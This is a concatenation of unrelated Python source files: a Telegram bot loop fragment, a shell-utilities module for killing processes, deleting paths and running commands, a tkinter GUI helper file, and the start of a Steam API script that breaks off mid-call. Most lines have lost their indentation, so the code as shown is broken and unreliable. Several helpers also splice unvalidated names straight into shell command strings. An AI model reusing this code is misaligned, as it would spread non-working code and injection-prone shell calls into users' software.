statics = Statics(db)
settings = SettingsTelegram().get_settings_tg()
telegram = TelegramApi(settings['token'])
hseTelegram = HseTelegram(db, telegram)
offset = None
call_back_id = None
admin_id = 453256909
while True:
result = get_list()
if not result or result is None:
        print('Test finished!')
break
last_update_id = result[0]['update_id']
offset = last_update_id + 1
    # Request statistics
# threading.Thread(target=statics.insert_request).start()
try:
try:
if result[0]['message']['chat']['type'] == 'supergroup' or result[0]['message']['chat']['type'] == 'group':
threading.Thread(target=groups_msg, args=(result,)).start()
continue
except:
if result[0]['callback_query']['message']['chat']['type'] == 'supergroup' or \
result[0]['callback_query']['message']['chat']['type'] == 'group':
threading.Thread(target=groups_msg, args=(result,)).start()
continue
threading.Thread(target=private_msg, args=(result,)).start()
except Exception as e:
log.input_log(Utils.get_date_now_sec() + ' ' + str(e))
continue
|
oper.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*
# Copyright: [CUP] - See LICENSE for details.
# Authors: Zhao Minghao, Guannan Ma
"""
:description:
shell operations related module
"""
from __future__ import print_function
import os
import sys
import time
import uuid
import tempfile
import shutil
import signal
import random
import hashlib
import platform
import warnings
import datetime
import threading
import subprocess
import cup
from cup import decorators
from cup import err
from cup import log
# linux only import
if platform.system() == 'Linux':
from cup.res import linux
__all__ = [
'rm', 'rmrf', 'kill',
    'is_process_used_port', 'is_port_used', 'is_proc_exist',
    'is_process_running',
'contains_file', 'backup_file',
'ShellExec'
]
# universal import (platform indepedent)
else:
__all__ = [
'contains_file', 'backup_file'
]
# linux functionalities {{
# pylint: disable=C0103
def rm(name):
"""
    Remove the file.
    Will not raise an exception if it fails
"""
try:
os.remove(name)
except OSError as error:
cup.log.warn("rm oserror: %s" % error)
def rmrf(fpath, safemode=True):
"""
:param fpath:
        files/directory to be deleted.
:param safemode:
True by default. You cannot delete root / when safemode is True
"""
@decorators.needlinux
def _real_rmrf(fpath, safemode):
"""
real rmrf
"""
if safemode:
if os.path.normpath(os.path.abspath(fpath)) == '/':
raise err.ShellException('cannot rmtree root / under safemode')
if os.path.isfile(fpath):
os.unlink(fpath)
else:
shutil.rmtree(fpath)
return _real_rmrf(fpath, safemode)
def is_process_running(path, name):
"""
Judge if the executable is running by comparing /proc files.
:platforms:
linux only. Will raise exception if running on other platforms
:param path:
        executable current working directory
:param name:
executable name
:return:
return True if the process is running. Return False otherwise.
"""
@decorators.needlinux
def _real_is_proc_exist(path, name):
"""
_real_is_proc_exist
"""
path = os.path.realpath(os.path.abspath(path))
cmd = 'ps -ef|grep %s|grep -v "^grep "|grep -v "^vim "|grep -v "^less "|\
grep -v "^vi "|grep -v "^cat "|grep -v "^more "|grep -v "^tail "|\
awk \'{print $2}\'' % (name)
ret = cup.shell.ShellExec().run(cmd, 10)
pids = ret['stdout'].strip().split('\n')
if len(pids) == 0 or len(pids) == 1 and len(pids[0]) == 0:
return False
for pid in pids:
for sel_path in ["cwd", "exe"]:
cmd = 'ls -l /proc/%s/%s|awk \'{print $11}\' ' % (pid, sel_path)
ret = cup.shell.ShellExec().run(cmd, 10)
pid_path = ret['stdout'].strip().strip()
if pid_path.find(path) == 0:
# print('%s is exist: %s' % (name, path))
return True
return False
return _real_is_proc_exist(path, name)
# for compatibility. Do not delete this line:
is_proc_exist = is_process_running
def _kill_child(pid, sign):
cmd = 'ps -ef|grep %s|grep -v grep|awk \'{print $2,$3}\'' % (pid)
ret = cup.shell.ShellExec().run(cmd, 10)
pids = ret['stdout'].strip().split('\n')
for proc in pids:
p_id = proc.split()
if p_id[1] == pid:
_kill_child(p_id[0], sign)
if p_id[0] == pid:
if len(sign) == 0:
cup.shell.execshell('kill %s' % pid)
elif sign == '9' or sign == '-9':
cup.shell.execshell('kill -9 %s' % pid)
elif sign == 'SIGSTOP' or sign == '19' or sign == '-19':
cup.shell.execshell('kill -19 %s' % pid)
elif sign == 'SIGCONT' or sign == '18' or sign == '-18':
cup.shell.execshell('kill -18 %s' % pid)
else:
cup.log.error('sign error')
def kill(path, name, sign='', b_kill_child=False):
"""
will judge if the process is running by calling function
(is_process_running), then send kill signal to this process
:param path:
        executable current working directory (cwd)
:param name:
executable name
:param sign:
kill sign, e.g. 9 for SIGKILL, 15 for SIGTERM
    :param b_kill_child:
kill child processes or not. False by default.
"""
path = os.path.realpath(os.path.abspath(path))
# path = os.path.abspath(path)
cmd = 'ps -ef|grep %s|grep -v grep|awk \'{print $2}\'' % (name)
ret = cup.shell.ShellExec().run(cmd, 10)
pids = ret['stdout'].strip().split('\n')
for pid in pids:
cmd = 'ls -l /proc/%s/cwd|awk \'{print $11}\' ' % (pid)
ret = cup.shell.ShellExec().run(cmd, 10)
if ret['returncode'] != 0:
return False
pid_path = ret['stdout'].strip()
if pid_path.find(path) == 0 or path.find(pid_path) == 0:
if b_kill_child is True:
_kill_child(pid, sign)
if len(sign) == 0:
cup.shell.execshell('kill %s' % pid)
elif sign == '9' or sign == '-9':
cup.shell.execshell('kill -9 %s' % pid)
elif sign == 'SIGSTOP' or sign == '19' or sign == '-19':
cup.shell.execshell('kill -19 %s' % pid)
elif sign == 'SIGCONT' or sign == '18' or sign == '-18':
cup.shell.execshell('kill -18 %s' % pid)
else:
cup.log.error('sign error')
return True
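# Illustrative usage (editor's sketch, paths assumed):
#   kill('/home/work/myapp', 'myapp', sign='9', b_kill_child=True)
# sends SIGKILL to the matching process (and its children) whose cwd matches the path.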
def backup_file(srcpath, filename, dstpath, label=None):
"""
    Backup srcpath/filename to dstpath/filename.label.
    If label is None, cup will use time.strftime('%H:%M:%S')
    :param dstpath:
        the folder will be created if it does not exist
"""
if label is None:
label = time.strftime('%H:%M:%S')
if not os.path.exists(dstpath):
os.makedirs(dstpath)
shutil.copyfile(
srcpath + '/' + filename, dstpath + '/' + filename + '.' + label
)
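# Illustrative usage (editor's sketch, paths assumed):
#   backup_file('/etc', 'hosts', '/tmp/backup', label='pre-change')
# copies /etc/hosts to /tmp/backup/hosts.pre-change.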
def backup_folder(srcpath, foldername, dstpath, label=None):
"""
    Same as backup_file, except it backs up a FOLDER (moved via os.rename), not a FILE.
"""
if label is None:
label = time.strftime('%H:%M:%S')
if not os.path.exists(dstpath):
os.makedirs(dstpath)
os.rename(
'%s/%s' % (srcpath, foldername),
'%s/%s' % (dstpath, foldername + '.' + label)
)
def is_path_contain_file(dstpath, dstfile, recursive=False, follow_link=False):
"""
    Use contains_file instead. Kept for compatibility purposes.
"""
return contains_file(dstpath, dstfile, recursive, follow_link)
def contains_file(dstpath, expected_name, recursive=False, follow_link=False):
"""
    judge if the expected file is in dstpath
    :param dstpath:
        search path
    :param expected_name:
        expected file name
    :param recursive:
        search recursively or not. False by default.
    :return:
        return True if found, False otherwise
"""
path = os.path.normpath(dstpath)
fpath = os.path.normpath(expected_name.strip())
fullpath = '{0}/{1}'.format(path, expected_name.strip())
fullpath = os.path.normpath(fullpath)
if recursive:
for (_, __, fnames) in os.walk(path, followlinks=follow_link):
for filename in fnames:
if filename == fpath:
return True
return False
else:
if os.path.exists(fullpath):
return True
else:
return False
def is_port_used(port):
"""
    judge if the port is in use (not 100% reliable: another process may grab
    the port right after this function returns)
:platform:
linux only (netstat command used inside)
:param port:
expected port
:return:
return True if the port is used, False otherwise
"""
@decorators.needlinux
def __is_port_used(port):
"""internal func"""
cmd = "netstat -nl | grep ':%s '" % (port)
ret = cup.shell.ShellExec().run(cmd, 10)
if 0 != ret['returncode']:
return False
stdout = ret['stdout'].strip()
if 0 == len(stdout):
return False
else:
return True
return __is_port_used(port)
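# Illustrative usage (editor's sketch, port assumed): is_port_used(8080) returns
# True if a local process is listening on port 8080 (Linux only, uses netstat).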
def is_process_used_port(process_path, port):
"""
judge if a process is using the port
:param process_path:
        process current working directory (cwd)
:return:
Return True if process matches
"""
# find the pid from by port
cmd = "netstat -nlp | grep ':%s '|awk -F ' ' '{print $7}'|\
cut -d \"/\" -f1" % (port)
ret = cup.shell.ShellExec().run(cmd, 10)
if 0 != ret['returncode']:
return False
stdout = ret['stdout'].strip()
if 0 == len(stdout):
return False
dst_pid = stdout.strip()
# check the path
path = os.path.abspath(process_path)
for sel_path in ['exe', 'cwd']:
cmd = 'ls -l /proc/%s/%s|awk \'{print $11}\' ' % (dst_pid, sel_path)
ret = cup.shell.ShellExec().run(cmd, 10)
pid_path = ret['stdout'].strip().strip()
if 0 == pid_path.find(path):
return True
return False
class Asynccontent(object):
"""
    Content holder for ShellExec.async_run; you have to delete it after use.
"""
def __init__(self):
self.cmd = None
self.timeout = None
self.pid = None
self.ret = {
'stdout': None,
'stderr': None,
'returncode': 0
}
self.child_list = []
self.cmdthd = None
self.monitorthd = None
self.subproc = None
self.tempscript = None
class ShellExec(object): # pylint: disable=R0903
"""
For shell command execution.
::
from cup import shell
shellexec = shell.ShellExec()
# timeout=None will block the execution until it finishes
shellexec.run('/bin/ls', timeout=None)
# timeout>=0 will open non-blocking mode
# The process will be killed if the cmd timeouts
shellexec.run(cmd='/bin/ls', timeout=100)
"""
def __init__(self, tmpdir='/tmp/'):
"""
:param tmpdir:
shellexec will use tmpdir to handle temp files
"""
self._subpro = None
self._subpro_data = None
self._tmpdir = tmpdir
self._tmpprefix = 'cup.shell.{0}'.format(uuid.uuid4())
@classmethod
def kill_all_process(cls, async_content):
"""
to kill all process
"""
for pid in async_content.child_list:
os.kill(pid, signal.SIGKILL)
@classmethod
def which(cls, pgm):
"""get executable"""
if os.path.exists(pgm) and os.access(pgm, os.X_OK):
return pgm
path = os.getenv('PATH')
for fpath in path.split(os.path.pathsep):
fpath = os.path.join(fpath, pgm)
if os.path.exists(fpath) and os.access(fpath, os.X_OK):
return fpath
@classmethod
def get_async_run_status(cls, async_content):
"""
get the process status of executing async cmd
:return:
None if the process has finished.
            Otherwise, return an object of linux.Process(async_pid)
"""
try:
async_process = linux.Process(async_content.pid)
res = async_process.get_process_status()
except err.NoSuchProcess:
res = None
return res
@classmethod
def get_async_run_res(cls, async_content):
"""
        If the process is still running, the result will be None, None, -999
"""
return async_content.ret
def async_run(self, cmd, timeout):
"""
async_run
        Returns an Asynccontent object holding cmd, timeout, ret, pid and the
        worker/monitor threads.
        On timeout, ret['returncode'] is set to 999.
        While the cmd is still running, ret['returncode'] stays -999.
"""
def _signal_handle():
"""
signal setup
"""
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def _target(argcontent):
argcontent.tempscript = tempfile.NamedTemporaryFile(
dir=self._tmpdir, prefix=self._tmpprefix,
delete=True
)
with open(argcontent.tempscript.name, 'w+b') as fhandle:
fhandle.write('cd {0};\n'.format(os.getcwd()))
fhandle.write(argcontent.cmd)
shexe = self.which('sh')
cmds = [shexe, argcontent.tempscript.name]
log.info(
'to async execute {0} with script {1}'.format(
argcontent.cmd, cmds)
)
try:
argcontent.subproc = subprocess.Popen(
cmds, stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=_signal_handle)
except OSError:
argcontent.ret['returncode'] = -1
argcontent.ret['stderr'] = (
                    'failed to execute the cmd, please check it out'
)
def _monitor(start_time, argcontent):
while(int(time.mktime(datetime.datetime.now().timetuple())) - int(start_time) <
int(argcontent.timeout)):
time.sleep(1)
if argcontent.subproc.poll() is not None:
self._subpro_data = argcontent.subproc.communicate()
argcontent.ret['returncode'] = argcontent.subproc.returncode
argcontent.ret['stdout'] = self._subpro_data[0]
argcontent.ret['stderr'] = self._subpro_data[1]
return
parent = linux.Process(argcontent.subproc.pid)
children = parent.children(True)
ret_dict = []
for process in children:
ret_dict.append(process)
argcontent.child_list = ret_dict
            str_warn = (
                'Shell "{0}" execution timeout: {1}. Killing it'.format(
                    argcontent.cmd, argcontent.timeout)
            )
self.kill_all_process(argcontent)
argcontent.ret['returncode'] = 999
argcontent.ret['stderr'] = str_warn
argcontent.subproc.terminate()
argcontent = Asynccontent()
argcontent.cmd = cmd
argcontent.timeout = timeout
argcontent.ret = {
'stdout': None,
'stderr': None,
'returncode': -999
}
argcontent.cmdthd = threading.Thread(
target=_target, args=(argcontent,))
argcontent.cmdthd.daemon = True
argcontent.cmdthd.start()
start_time = int(time.mktime(datetime.datetime.now().timetuple()))
argcontent.cmdthd.join(0.1)
argcontent.pid = argcontent.subproc.pid
argcontent.monitorthd = threading.Thread(target=_monitor,
args=(start_time, argcontent))
argcontent.monitorthd.daemon = True
argcontent.monitorthd.start()
        # this join could be removed if Process.children can be made quicker
argcontent.cmdthd.join(0.5)
return argcontent
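    # Illustrative usage of the async API (editor's sketch, cmd assumed):
    #   shellexec = ShellExec()
    #   content = shellexec.async_run('sleep 3; echo done', timeout=10)
    #   status = ShellExec.get_async_run_status(content)  # None once finished
    #   result = ShellExec.get_async_run_res(content)     # {'stdout': ..., 'stderr': ..., 'returncode': ...}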
def run(self, cmd, timeout):
"""
refer to the class description
:param timeout:
If the cmd is not returned after [timeout] seconds, the cmd process
will be killed. If timeout is None, will block there until the cmd
execution returns
:return:
{
'stdout' : 'Success',
'stderr' : None,
'returncode' : 0
}
returncode == 0 means success, while 999 means timeout
E.g.
::
import cup
shelltool = cup.shell.ShellExec()
print shelltool.run('/bin/ls', timeout=1)
"""
def _signal_handle():
"""
signal setup
"""
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def _pipe_asshell(cmd):
"""
run shell with subprocess.Popen
"""
tempscript = tempfile.NamedTemporaryFile(
dir=self._tmpdir, prefix=self._tmpprefix,
delete=True
)
with open(tempscript.name, 'w+b') as fhandle:
fhandle.write('cd {0};\n'.format(os.getcwd()))
fhandle.write(cmd)
shexe = self.which('sh')
cmds = [shexe, tempscript.name]
log.info(
'cup shell execute {0} with script {1}'.format(
cmd, cmds)
)
self._subpro = subprocess.Popen(
cmds, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=_signal_handle
)
self._subpro_data = self._subpro.communicate()
ret = {
'stdout': None,
'stderr': None,
'returncode': 0
}
cmdthd = threading.Thread(
target=_pipe_asshell, args=(cmd, )
)
cmdthd.start()
cmdthd.join(timeout)
if cmdthd.isAlive():
            str_warn = (
                'Shell "%s" execution timeout: %d. Killed it' % (cmd, timeout)
            )
warnings.warn(str_warn, RuntimeWarning)
parent = linux.Process(self._subpro.pid)
for child in parent.children(True):
os.kill(child, signal.SIGKILL)
ret['returncode'] = 999
ret['stderr'] = str_warn
self._subpro.terminate()
else:
self._subpro.wait()
times = 0
while self._subpro.returncode is None and times < 10:
time.sleep(1)
times += 1
ret['returncode'] = self._subpro.returncode
assert type(self._subpro_data) == tuple, \
'self._subpro_data should be a tuple'
ret['stdout'] = self._subpro_data[0]
ret['stderr'] = self._subpro_data[1]
return ret
def _do_execshell(cmd, b_printcmd=True, timeout=None):
"""
do execshell
"""
if timeout is not None and timeout < 0:
raise cup.err.ShellException(
'timeout should be None or >= 0'
)
if b_printcmd is True:
print('To exec cmd:{0}'.format(cmd))
shellexec = ShellExec()
return shellexec.run(cmd, timeout)
def execshell(cmd, b_printcmd=True, timeout=None):
"""
    Execute a shell command and return its returncode.
"""
return _do_execshell(
cmd, b_printcmd=b_printcmd, timeout=timeout)['returncode']
def execshell_withpipe(cmd):
"""
Deprecated. Use ShellExec instead
"""
res = os.popen(cmd)
return res
def execshell_withpipe_ex(cmd, b_printcmd=True):
"""
    Deprecated. Recommend using ShellExec instead.
"""
strfile = '/tmp/%s.%d.%d' % (
'shell_env.py', int(os.getpid()), random.randint(100000, 999999)
)
os.mknod(strfile)
cmd = cmd + ' 1>' + strfile + ' 2>/dev/null'
os.system(cmd)
if True == b_printcmd:
print(cmd)
fphandle = open(strfile, 'r')
lines = fphandle.readlines()
fphandle.close()
os.unlink(strfile)
return lines
def execshell_withpipe_str(cmd, b_printcmd=True):
"""
    Deprecated. Recommend using ShellExec instead.
"""
return ''.join(execshell_withpipe_ex(cmd, b_printcmd))
def execshell_withpipe_exwitherr(cmd, b_printcmd=True):
"""
    Deprecated. Recommend using ShellExec instead.
"""
strfile = '/tmp/%s.%d.%d' % (
'shell_env.py', int(os.getpid()), random.randint(100000, 999999)
)
cmd = cmd + ' >' + strfile
cmd = cmd + ' 2>&1'
os.system(cmd)
if b_printcmd:
print(cmd)
fhandle = open(strfile, 'r')
lines = fhandle.readlines()
fhandle.close()
os.unlink(strfile)
return lines
def is_proc_alive(procname, is_whole_word=False, is_server_tag=False, filters=False):
"""
    Deprecated. Recommend using cup.oper.is_proc_exist instead.
"""
# print procName
if is_whole_word:
cmd = "ps -ef|grep -w '%s'$ |grep -v grep" % procname
else:
cmd = "ps -ef|grep -w '%s' |grep -v grep" % procname
if is_server_tag:
cmd += '|grep -vwE "vim |less |vi |tail |cat |more "'
if filters:
if isinstance(filters, str):
cmd += "|grep -v '%s'" % filters
elif isinstance(filters, list):
for _, task in enumerate(filters):
cmd += "|grep -v '%s'" % task
cmd += '|wc -l'
rev = execshell_withpipe_str(cmd, False)
if int(rev) > 0:
return True
else:
return False
def forkexe_shell(cmd):
"""
fork a new process to execute cmd (os.system(cmd))
"""
try:
pid = os.fork()
if pid > 0:
return
except OSError:
sys.exit(1)
# os.chdir("/")
os.setsid()
# os.umask(0)
try:
pid = os.fork()
if pid > 0:
sys.exit(0)
except OSError:
sys.exit(1)
os.system(cmd)
def md5file(filename):
"""
compute md5 hex value of a file, return with a string (hex-value)
"""
if os.path.exists(filename) is False:
raise IOError('No such file: %s' % filename)
with open(filename, 'rb') as fhandle:
md5obj = hashlib.md5()
while True:
strtmp = fhandle.read(131072) # read 128k one time
if len(strtmp) <= 0:
break
if isinstance(strtmp, unicode):
md5obj.update(strtmp.encode('utf-8'))
else:
md5obj.update(strtmp)
return md5obj.hexdigest()
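# Illustrative usage (editor's sketch, path assumed): md5file('/etc/hosts') returns
# the md5 hex digest of the file, e.g. 'd41d8cd98f00b204e9800998ecf8427e' for an empty file.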
def kill9_byname(strname):
"""
kill -9 process by name
"""
fd_pid = os.popen("ps -ef | grep -v grep |grep %s \
|awk '{print $2}'" % (strname))
pids = fd_pid.read().strip().split('\n')
fd_pid.close()
for pid in pids:
os.system("kill -9 %s" % (pid))
def kill_byname(strname):
"""
kill process by name
"""
fd_pid = os.popen("ps -ef | grep -v grep |grep %s \
|awk '{print $2}'" % (strname))
pids = fd_pid.read().strip().split('\n')
fd_pid.close()
for pid in pids:
os.system("kill -s SIGKILL %s" % (pid))
def del_if_exist(path, safemode=True):
"""
delete the path if it exists, cannot delete root / under safemode
"""
if safemode and path == '/':
raise IOError('Cannot delete root path /')
if os.path.lexists(path) is False:
return -1
if os.path.isdir(path):
shutil.rmtree(path)
elif os.path.isfile(path) or os.path.islink(path):
os.unlink(path)
else:
        raise IOError('Does not support deleting this type of path')
def rmtree(path, ignore_errors=False, onerror=None, safemode=True):
"""
safe rmtree.
safemode, by default is True, which forbids:
1. not allowing rmtree root "/"
"""
if safemode:
if os.path.normpath(os.path.abspath(path)) == '/':
raise err.ShellException('cannot rmtree root / under safemode')
if os.path.isfile(path):
return os.unlink(path)
else:
return shutil.rmtree(path, ignore_errors, onerror)
def shell_diff(srcfile, dstfile):
"""
shell diff two files, return 0 if it's the same.
"""
cmd = 'diff %s %s' % (srcfile, dstfile)
return os.system(cmd)
def get_pid(process_path, grep_string):
"""
    Will return immediately after finding the pid that matches:
1. ps -ef|grep %s|grep -v grep|grep -vE "^[vim|less|vi|tail|cat|more] "
'|awk '{print $2}'
2. workdir is the same as ${process_path}
:param process_path:
process that runs on
:param grep_string:
ps -ef|grep ${grep_string}
:return:
return None if not found. Otherwise, return the pid
"""
cmd = (
'ps -ef|grep \'%s\'|grep -v grep|grep -vwE "vim |less |vi |tail |cat |more "'
'|awk \'{print $2}\''
) % (grep_string)
ret = cup.shell.ShellExec().run(cmd, 10)
pids = ret['stdout'].strip().split('\n')
if len(pids) == 0 or len(pids) == 1 and len(pids[0]) == 0:
return None
for pid in pids:
for sel_path in ["cwd", "exe"]:
cmd = 'ls -l /proc/%s/%s|awk \'{print $11}\' ' % (pid, sel_path)
ret = cup.shell.ShellExec().run(cmd, 10)
pid_path = ret['stdout'].strip().strip()
if pid_path.find(process_path) == 0:
return pid
return None
# end linux functionalities }}
# vi:set tw=0 ts=4 sw=4 nowrap fdm=indent
|
GuiUtils.py
|
import queue
import threading
import tkinter as tk
import traceback
from Utils import data_path, is_bundled
def set_icon(window):
er16 = tk.PhotoImage(file=data_path('ER16.gif'))
er32 = tk.PhotoImage(file=data_path('ER32.gif'))
er48 = tk.PhotoImage(file=data_path('ER48.gif'))
window.tk.call('wm', 'iconphoto', window._w, er16, er32, er48) # pylint: disable=protected-access
# Although tkinter is intended to be thread safe, there are many reports of issues,
# some of which may be platform specific or depend on whether the TCL library was
# compiled without multithreading support. Therefore I assume it is not thread safe
# to avoid any possible problems.
class BackgroundTask(object):
def __init__(self, window, code_to_run, *code_arg):
self.window = window
self.status = None
self.queue = queue.Queue()
self.running = True
self.task = threading.Thread(target=self.try_run, args=(code_to_run, *code_arg))
self.task.start()
self.process_queue()
def try_run(self, code_to_run, *code_arg):
try:
code_to_run(*code_arg)
except Exception as e:
self.update_status('Error: ' + str(e))
if not is_bundled():
traceback.print_exc()
self.queue_event(self.stop)
def update_status(self, text):
self.status = text
def stop(self):
self.running = False
#safe to call from worker
def queue_event(self, event):
self.queue.put(event)
def process_queue(self):
try:
while True:
if not self.running:
return
event = self.queue.get_nowait()
event()
if self.running:
#if self is no longer running self.window may no longer be valid
self.window.update_idletasks()
except queue.Empty:
pass
if self.running:
self.window.after(100, self.process_queue)
class BackgroundTaskProgress(BackgroundTask):
def __init__(self, parent, title, code_to_run, *code_arg):
self.parent = parent
self.window = tk.Toplevel(parent)
self.window['padx'] = 5
self.window['pady'] = 5
try:
self.window.attributes("-toolwindow", 1)
except tk.TclError:
pass
self.window.title(title)
self.lastpercent = 0
self.progress_var = tk.DoubleVar()
self.progress = tk.ttk.Progressbar(self.window, variable=self.progress_var, length=300)
self.progress.pack()
self.label_var = tk.StringVar(value="")
self.label = tk.Label(self.window, textvariable=self.label_var, width=50, wrap=300)
self.label.pack()
self.button_var = tk.StringVar(value="Please wait...")
self.button = tk.Button(self.window, textvariable=self.button_var, width=10, height=2, state='disabled', command=self.close)
self.button.pack()
self.window.resizable(width=False, height=False)
set_icon(self.window)
self.window.transient(parent)
self.window.protocol("WM_DELETE_WINDOW", self.close_pass)
self.window.grab_set()
self.window.geometry("+%d+%d" % (parent.winfo_rootx()+50, parent.winfo_rooty()+150))
self.window.focus_set()
super().__init__(self.window, code_to_run, *tuple(list(code_arg) + [self]))
self.parent.wait_window(self.window)
def close_pass(self):
pass
#safe to call from worker thread
def update_status(self, text):
self.queue_event(lambda: self.label_var.set(text))
def update_progress(self, val):
if int(val) != self.lastpercent:
self.lastpercent = int(val)
self.queue_event(lambda: self.progress_var.set(val))
def update_title(self, text):
self.queue_event(lambda: self.window.title(text))
def close(self):
self.running = False
self.window.destroy()
def stop(self):
self.running = False
self.progress_var.set(100)
self.window.bell()
self.button.configure(state='normal')
self.button_var.set("OK")
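# Illustrative usage (editor's sketch, names assumed): the worker receives the
# BackgroundTaskProgress instance as its last argument and reports back through it.
#   def work(settings, gui):
#       gui.update_status('Working...')
#       gui.update_progress(50)
#   BackgroundTaskProgress(root, 'Generating', work, settings)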
class Dialog(tk.Toplevel):
def __init__(self, parent, title=None, question=None, oktext=None, canceltext=None):
tk.Toplevel.__init__(self, parent)
self.transient(parent)
if title:
self.title(title)
self.parent = parent
self.result = False
if question:
body = tk.Frame(self)
label = tk.Label(body, text=question, width=50, wrap=200)
label.pack()
body.pack(padx=5, pady=5)
box = tk.Frame(self)
w = tk.Button(box, text=oktext if oktext else "OK", width=20, command=self.ok, default=tk.ACTIVE)
w.pack(side=tk.LEFT, padx=5, pady=5)
w = tk.Button(box, text=canceltext if canceltext else "Cancel", width=20, command=self.cancel)
w.pack(side=tk.LEFT, padx=5, pady=5)
self.bind("<Return>", self.ok)
self.bind("<Escape>", self.cancel)
box.pack()
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.cancel)
self.geometry("+%d+%d" % (parent.winfo_rootx()+50,
parent.winfo_rooty()+150))
self.wait_window(self)
#
# standard button semantics
def ok(self, event=None):
self.result = True
self.withdraw()
self.update_idletasks()
self.cancel()
def cancel(self, event=None):
# put focus back to the parent window
self.parent.focus_set()
self.destroy()
class ToolTips(object):
# This class derived from wckToolTips which is available under the following license:
# Copyright (c) 1998-2007 by Secret Labs AB
# Copyright (c) 1998-2007 by Fredrik Lundh
#
# By obtaining, using, and/or copying this software and/or its
# associated documentation, you agree that you have read, understood,
# and will comply with the following terms and conditions:
#
# Permission to use, copy, modify, and distribute this software and its
# associated documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appears in all
# copies, and that both that copyright notice and this permission notice
# appear in supporting documentation, and that the name of Secret Labs
# AB or the author not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO
# THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
label = None
window = None
active = 0
tag = None
after_id = None
@classmethod
def getcontroller(cls, widget):
if cls.tag is None:
cls.tag = "ui_tooltip_%d" % id(cls)
widget.bind_class(cls.tag, "<Enter>", cls.enter)
widget.bind_class(cls.tag, "<Leave>", cls.leave)
widget.bind_class(cls.tag, "<Motion>", cls.motion)
widget.bind_class(cls.tag, "<Destroy>", cls.leave)
# pick suitable colors for tooltips
try:
cls.bg = "systeminfobackground"
cls.fg = "systeminfotext"
widget.winfo_rgb(cls.fg) # make sure system colors exist
widget.winfo_rgb(cls.bg)
except Exception:
cls.bg = "#ffffe0"
cls.fg = "black"
return cls.tag
@classmethod
def register(cls, widget, text):
if isinstance(text, str):
text = '\n'.join([line.strip() for line in text.splitlines()]).strip()
widget.ui_tooltip_text = text
widget.ui_tooltip_text_prev = None
tags = list(widget.bindtags())
tags.append(cls.getcontroller(widget))
widget.bindtags(tuple(tags))
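    # Illustrative usage (editor's sketch): ToolTips.register(button, "Saves the file")
    # attaches balloon help to the widget; ToolTips.unregister(button) removes it.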
@classmethod
def unregister(cls, widget):
tags = list(widget.bindtags())
tags.remove(cls.getcontroller(widget))
widget.bindtags(tuple(tags))
# event handlers
@classmethod
def enter(cls, event):
widget = event.widget
if not cls.label:
# create and hide balloon help window
cls.popup = tk.Toplevel(bg=cls.fg, bd=1)
cls.popup.overrideredirect(1)
cls.popup.withdraw()
cls.label = tk.Label(
cls.popup, fg=cls.fg, bg=cls.bg, bd=0, padx=2, justify=tk.LEFT, wrap=400
)
cls.label.pack()
cls.active = 1
cls.xy = event.x_root + 16, event.y_root + 10
cls.event_xy = event.x, event.y
cls.after_id = widget.after(200, cls.display, widget)
@classmethod
def motion(cls, event):
cls.xy = event.x_root + 16, event.y_root + 10
cls.event_xy = event.x, event.y
cls.display(event.widget)
@classmethod
def display(cls, widget):
# display balloon help window
if cls.active:
text = widget.ui_tooltip_text
if callable(text):
text = text(widget, cls.event_xy)
if not text:
return
if widget.ui_tooltip_text_prev == text:
return
widget.ui_tooltip_text_prev = text
cls.label.config(text=text)
cls.popup.deiconify()
cls.popup.lift()
cls.popup.geometry("+%d+%d" % cls.xy)
cls.after_id = None
@classmethod
def leave(cls, event):
widget = event.widget
widget.ui_tooltip_text_prev = None
if cls.active:
cls.popup.withdraw()
cls.active = 0
if cls.after_id:
widget.after_cancel(cls.after_id)
cls.after_id = None
class ValidatingEntry(tk.Entry):
    def __init__(self, master, command=lambda:True, validate=lambda value: value, **kw):
tk.Entry.__init__(self, master, **kw)
self.validate = validate
self.command = command
if 'textvariable' in kw:
self.__variable = kw['textvariable']
else:
self.__variable = tk.StringVar()
self.__prev_value = self.__variable.get()
self.__variable.trace("w", self.__callback)
self.config(textvariable=self.__variable)
def __callback(self, *dummy):
new_value = self.__variable.get()
valid_value = self.validate(new_value)
if valid_value is None:
self.__variable.set(self.__prev_value)
elif valid_value != new_value:
self.__prev_value = valid_value
            self.__variable.set(valid_value)
else:
self.__prev_value = new_value
self.command()
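# Illustrative usage (editor's sketch): the validate callback returns None to
# reject a change, a modified string to coerce it, or the value unchanged to accept it.
#   entry = ValidatingEntry(root, validate=lambda value: value if value.isdigit() else None)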
class SearchBox(tk.ttk.Combobox):
def __init__(self, master, options, **kw):
tk.ttk.Combobox.__init__(self, master, **kw)
self.options = options
if 'textvariable' in kw:
self.__variable = kw['textvariable']
else:
self.__variable = tk.StringVar()
self.__variable.trace('w', self.__callback)
self.bind("<<ComboboxSelected>>", self.__select_callback)
self.config(textvariable=self.__variable, values=list(self.options))
def __callback(self, *dummy):
search_key = self.__variable.get().lower()
filter_options = list(filter(lambda value: search_key in value.lower(), self.options))
self.config(values=filter_options)
def __select_callback(self, *dummy):
self.config(values=list(self.options))
|
user_owned_games.py
|
import requests
import time
import json
import threading
import queue
import yaml
from sqlalchemy import create_engine
from sqlalchemy.types import BigInteger, Integer
import pandas as pd
def split_list(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
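# Illustrative (editor's note): list(split_list([1, 2, 3, 4, 5], 2)) == [[1, 2], [3, 4], [5]]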
def worker_get_owned_games(lst_user_id, api_key, q):
dic_temp = {}
for user_id in lst_user_id:
for i in range(3):
try:
r = requests.get(
